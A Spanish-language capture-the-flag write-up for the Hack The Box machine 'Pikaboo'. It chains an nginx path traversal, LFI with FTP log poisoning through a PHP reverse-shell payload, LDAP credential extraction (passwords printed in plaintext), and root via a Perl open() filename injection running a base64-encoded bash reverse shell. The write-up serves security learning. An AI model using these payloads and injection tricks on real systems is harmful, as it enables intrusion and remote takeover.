# Pikaboo

**OS**: Linux \
**Dificultad**: Difícil \
**Puntos**: 20

## Resumen
- Path Traversal Nginx
- Apache Reverse Proxy
- LFI/RCE
- FTP Log Poisoning
- LDAPsearch
- Perl open() Command Execution

## Nmap Scan

`nmap -sV -sC -oN nmap.txt 10.10.10.249`

```
Nmap scan report for 10.10.10.249
Host is up (0.072s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 17:e1:13:fe:66:6d:26:b6:90:68:d0:30:54:2e:e2:9f (RSA)
|   256 92:86:54:f7:cc:5a:1a:15:fe:c6:09:cc:e5:7c:0d:c3 (ECDSA)
|_  256 f4:cd:6f:3b:19:9c:cf:33:c6:6d:a5:13:6a:61:01:42 (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Pikaboo
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

## Enumeración

Enumerando la pagina web encontramos tres opciones **Pokatdex, Contact, Admin** si intentamos acceder al portal de Admin nos pide credenciales.

![1](img/1.png)

Al darle en cancelar nos muestra una pagina de error pero algo interesante es el texto **Apache/2.4.38 (Debian) Server at 127.0.0.1 Port 81**.

![2](img/2.png)

### Path Traversal Nginx(Apache Reverse Proxy)

Suponemos que se esta ejecutando un apache reverse proxy junto con la aplicacion que usa nginx. Investigando llegamos a un par de blogs [Common Nginx misconfiguration](https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/) y [Reverse Proxy Attacks](https://www.acunetix.com/blog/articles/a-fresh-look-on-reverse-proxy-related-attacks/), una de las **misconfigurations** nos permite acceder a endpoints no autotizados.

`http://10.10.10.249/admin../server-status`

![3](img/3.png)

Vemos un directorio interesante **admin_staging**.

![4](img/4.png)

Utilizando la misma vulnerabilidad podemos acceder al portal.

`http://10.10.10.249/admin../admin_staging/`

![5](img/5.png)

### FTP Log Poisoning (LFI/RCE)

Enumerando la pagina web vemos el parametro **page** esto posiblemente sea vulnerable a **Local File Inclusion**.

`http://10.10.10.249/admin../admin_staging/index.php?page=tables.php`

![6](img/6.png)

Si recordamos esta abierto el puerto 21 FTP y probando directorios en el parametro es posible leer el archivo **vsftpd.log**.

`http://10.10.10.249/admin../admin_staging/index.php?page=/var/log/vsftpd.log`

![7](img/7.png)

Esto lo podemos escalar a **Remote Code Execution** para obtener una reverse shell. Nos conectamos al FTP y en la parte de **Name** escribiremos nuestro comando.

- `ftp 10.10.10.249`
- `<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.33/1234 0>&1'");?>`

![8](img/8.png)

Ahora solo ponemos a la escucha nuestro netcat y consultamos el archivo **vsftpd.log**.

`curl "http://10.10.10.249/admin../admin_staging/index.php?page=/var/log/vsftpd.log"`

![9](img/9.png)

## Escalada de Privilegios (User)

Enumerando el sistema dentro de **opt** se encuentran los archivos de **pokeapi** dentro de **settings.py** vemos credenciales de ldap.

`cat /opt/pokeapi/config/settings.py`

![10](img/10.png)

### LDAPsearch

El puerto 389 se encuentra abierto localmente, podemos usar la credenciales para conectarnos.

`netstat -putona`

![11](img/11.png)

Utilizando la herramienta **ldapsearch** enumearmos el servicio y obtenemos una cadena en base64.

`ldapsearch -H ldap://127.0.0.1 -D "cn=binduser,ou=users,dc=pikaboo,dc=htb" -w "J~42%W?PFHl]g" -b "dc=pikaboo,dc=htb" "(objectClass=person)"`

![12](img/12.png)

Hacemos decode de la cadena.

`echo 'X0cwdFQ0X0M0dGNIXyczbV80bEwhXw==' | base64 -d; echo`

![13](img/13.png)

Ahora podemos conectarnos por FTP.

```
pwnmeow : _G0tT4_C4tcH_'3m_4lL!_
```

![14](img/14.png)

## Escalada de Privilegios (Root)

Utilizando linpeas vemos que hay un crontab que se esta ejecutando.

![15](img/15.png)

Leyendo csvupdate_cron, el script esta haciendo uso de **/usr/local/bin/csvupdate** y le pasa el nombre de los directorios utilizando **basename**.

`cat /usr/local/bin/csvupdate_cron`

![16](img/16.png)

### Perl open() Command Execution

Si revisamos el archivo **/usr/local/bin/csvupdate** vemos que es un script en perl y esta haciendo uso de **open** para abrir los directorios. Investigando un poco encontramos un par de articulos [open() for Command Execution](https://www.shlomifish.org/lecture/Perl/Newbies/lecture4/processes/opens.html), [Code/Markup Injection and Its Prevention](http://perl-begin.org/topics/security/code-markup-injection/).

![17](img/17.png)

Donde basicamente nos mencionan que si anteponemos un **pipe(|)** el resto del nombre se interpretara como comando.

Tomando en cuenta todo lo anterior podemos generar un archivo poniendo el comando como nombre y cuando abra el archivo lo ejecutara.

- `echo "bash -c 'bash -i >& /dev/tcp/10.10.14.33/4444 0>&1'" | base64`
- `touch "|echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4zMy80NDQ0IDA+JjEnCg== | base64 -d | bash;.csv"`
- `touch doom`

![18](img/18.png)

Ahora nos conectamos por FTP e ingresamos con las credenciales anteriores, nos movemos de directorio y subimos nuestro 2 archivos que generamos. Subimos 2 archivos ya que el primero se ejecutara localmente y el segundo en el servidor remoto.

- `ftp 10.10.10.249`
- `cd abilities`
- `put doom "|echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4zMy80NDQ0IDA+JjEnCg== | base64 -d | bash;.csv"`

![19](img/19.png)

Esperamos un momento y nos regresara nuestra reverse shell como root.

`nc -lvnp 4444`

![20](img/20.png)

## Referencias
https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/ \
https://www.acunetix.com/blog/articles/a-fresh-look-on-reverse-proxy-related-attacks/ \
https://secnhack.in/ftp-log-poisoning-through-lfi/ \
https://book.hacktricks.xyz/pentesting-web/file-inclusion \
https://www.shlomifish.org/lecture/Perl/Newbies/lecture4/processes/opens.html \
http://perl-begin.org/topics/security/code-markup-injection/

